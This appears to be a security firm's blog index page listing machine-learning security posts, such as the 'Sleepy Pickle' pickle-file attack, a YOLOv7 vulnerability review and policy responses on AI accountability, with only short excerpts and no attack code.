Machine-Learning

Exploiting ML models with pickle file attacks: Part 2

Boyan Milanov
In part 1, we introduced Sleepy Pickle, an attack that uses malicious pickle files to stealthily compromise ML models and carry out sophisticated attacks against end users. Here we show how this technique can be adapted to enable long-lasting presence on compromised systems while remaining undetected. This variant technique, which we call […]

Exploiting ML models with pickle file attacks: Part 1

Boyan Milanov
We’ve developed a new hybrid machine learning (ML) model exploitation technique called Sleepy Pickle that takes advantage of the pervasive and notoriously insecure Pickle file format used to package and distribute ML models. Sleepy pickle goes beyond previous exploit techniques that target an organization’s systems when they deploy ML models to instead […]

Announcing AI/ML safety and security trainings

Michael D. Brown
We are offering AI/ML safety and security training this year! Recent advances in AI/ML technologies opened up a new world of possibilities for businesses to run more efficiently and offer better services and products. However, incorporating AI/ML into computing systems brings new and unique complexities, risks, and attack surfaces. In our experience […]

Our response to the US Army’s RFI on developing AIBOM tools

Adelin Travers, Michael Brown
The US Army’s Program Executive Office for Intelligence, Electronic Warfare and Sensors (PEO IEW&S) recently issued a request for information (RFI) on methods to implement and automate production of an artificial intelligence bill of materials (AIBOM) as part of Project Linchpin. The RFI describes the AIBOM as a detailed […]

Celebrating our 2023 open-source contributions

At Trail of Bits, we pride ourselves on making our best tools open source, such as Slither, PolyTracker, and RPC Investigator. But while this post is about open source, it’s not about our tools… In 2023, our employees submitted over 450 pull requests (PRs) that were merged into non-Trail of Bits repositories. This demonstrates our […]

Our thoughts on AIxCC’s competition format

Michael Brown
Late last month, DARPA officially opened registration for their AI Cyber Challenge (AIxCC). As part of the festivities, DARPA also released some highly anticipated information about the competition: a request for comments (RFC) that contained a sample challenge problem and the scoring methodology. Prior rules documents and FAQs released by DARPA painted […]

AI In Windows: Investigating Windows Copilot

Yarden Shafir
AI is becoming ubiquitous, as developers of widely used tools like GitHub and Photoshop are quickly implementing and iterating on AI-enabled features. With Microsoft’s recent integration of Copilot into Windows, AI is even on the old stalwart of computing—the desktop. The integration of an AI assistant into an entire operating system is […]

Assessing the security posture of a widely used vision model: YOLOv7

Alvin Crighton, Anusha Ghosh, Suha Hussain, Heidy Khlaaf, Jim Miller
TL;DR: We identified 11 security vulnerabilities in YOLOv7, a popular computer vision framework, that could enable attacks including remote code execution (RCE), denial of service, and model differentials (where an attacker can trigger a model to perform differently in different contexts). Open-source software […]

How AI will affect cybersecurity: What we told the CFTC

Dan Guido, CEO The second meeting of the Commodity Futures Trading Commission’s Technology Advisory Committee (TAC) on July 18 focused on the effects of AI on the financial sector. During the meeting, I explained that AI has the potential to fundamentally change the balance between cyber offense and defense, and that we need security-focused benchmarks […]

Trail of Bits’s Response to OSTP National Priorities for AI RFI

Heidy Khlaaf, Michael Brown
The Office of Science and Technology Policy (OSTP) has circulated a request for information (RFI) on how best to develop policies that support the responsible development of AI while minimizing risk to rights, safety, and national security. In our response, we highlight the following points: To ensure that AI […]

Trail of Bits’s Response to NTIA AI Accountability RFC

Artem Dinaburg, Heidy Khlaaf
The National Telecommunications and Information Administration (NTIA) has circulated an Artificial Intelligence (AI) Accountability Policy Request for Comment on what policies can support the development of AI audits, assessments, certifications, and other mechanisms to create earned trust in AI systems. Trail of Bits has submitted a response to the […]

We need a new way to measure AI security

Tl;dr: Trail of Bits has launched a practice focused on machine learning and artificial intelligence, bringing together safety and security methodologies to create a new risk assessment and assurance program. This program evaluates potential bespoke risks and determines the necessary safety and security measures for AI-based systems. If you’ve read any news over the past […]